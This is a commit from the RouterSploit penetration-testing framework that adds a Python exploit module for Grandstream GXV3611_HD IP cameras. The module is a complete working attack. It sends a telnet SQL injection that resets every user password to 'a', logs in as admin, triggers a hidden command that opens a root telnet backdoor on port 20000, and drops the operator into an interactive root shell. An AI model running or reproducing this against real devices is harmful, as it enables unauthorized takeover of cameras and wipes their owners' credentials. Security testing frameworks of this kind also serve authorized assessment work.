Adding Grandstream GXV3611_HD RCE

d90572c0 · Joshua Abraham · 041c29ea · d90572c0 · d90572c0 · d90572c0
Commit d90572c0 authored Jan 29, 2017 by Joshua Abraham
6 changed files
--- a/.DS_Store
+++ b/.DS_Store
--- a/routersploit/.DS_Store
+++ b/routersploit/.DS_Store
--- a/routersploit/modules/.DS_Store
+++ b/routersploit/modules/.DS_Store
--- a/routersploit/modules/exploits/.DS_Store
+++ b/routersploit/modules/exploits/.DS_Store
--- a/routersploit/modules/exploits/grandstream/__init__.py
+++ b/routersploit/modules/exploits/grandstream/__init__.py
--- a/routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py
+++ b/routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py
+import telnetlib
+
+from routersploit import (
+    exploits,
+    mute,
+    sanitize_url,
+    print_error,
+    print_success,
+    print_status,
+    print_table,
+)
+
+class Exploit(exploits.Exploit):
+    """
+    Simple description
+    """
+    __info__ = {
+        'name': 'Grandsteam GXV3611_HD - SQL Injection',
+        'description':  'Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. '
+                        'After the SQLI is triggered, the module opens a backdoor on TCP/20000 and connects to it',
+        'authors': [
+             'pizza1337',     # exploit author
+             'Joshua Abraham', # routesploit module
+        ],
+        'references': [
+             'https://www.exploit-db.com/exploits/40441/',
+             'http://boredhackerblog.blogspot.com/2016/05/hacking-ip-camera-grandstream-gxv3611hd.html',
+        ],
+        'devices': [
+            'Grandstream GXV3611_HD',
+        ],
+    }
+
+    target = exploits.Option('', 'Target IP address e.g. 192.168.1.1') # target address
+    port = exploits.Option(23, 'Target port') # default port
+
+    def run(self):
+        if self.check():
+            print_success("Target appears to be vulnerable...")
+
+            try:
+                conn = telnetlib.Telnet(self.target, self.port)
+                conn.read_until("Username: ")
+                conn.write("';update user set password='a';--\r\n") #This changes all the passwords to 'a'
+                conn.read_until("Password: ")
+                conn.write("nothing\r\n")
+                conn.read_until("Username: ")
+                conn.write("admin\r\n")
+                conn.read_until("Password: ")
+                conn.write("a\r\n") #Login with the new password
+                conn.read_until("> ")
+                conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup.
+                conn.read_until("> ")
+                conn.write("quit\r\n")
+                conn.close()
+                print_success("SQLI successful, going to telnet into port 20000 with username root and no password to get shell")
+            except:
+                print_error("Exploit failed. Could not log in.")
+
+            try:
+                conn = telnetlib.Telnet(self.target, 20000)
+                conn.read_until("login: ")
+                conn.write("root\r\n")
+                conn.read_until("Password: ")
+                conn.write("\r\n")
+                conn.read_until("# ")
+                print_success("Authenticaiton Successful")
+                conn.interact()
+            except:
+                print_error("Failed to log into backdoor.")
+               
+        else:
+            print_error("Exploit failed. Target does not appear vulnerable")
+
+    @mute
+    def check(self):
+        conn = telnetlib.Telnet(self.target, self.port)
+        output = conn.read_until("login:")
+        if 'Grandstream' in output:
+            return True
+        else:
+            return False
+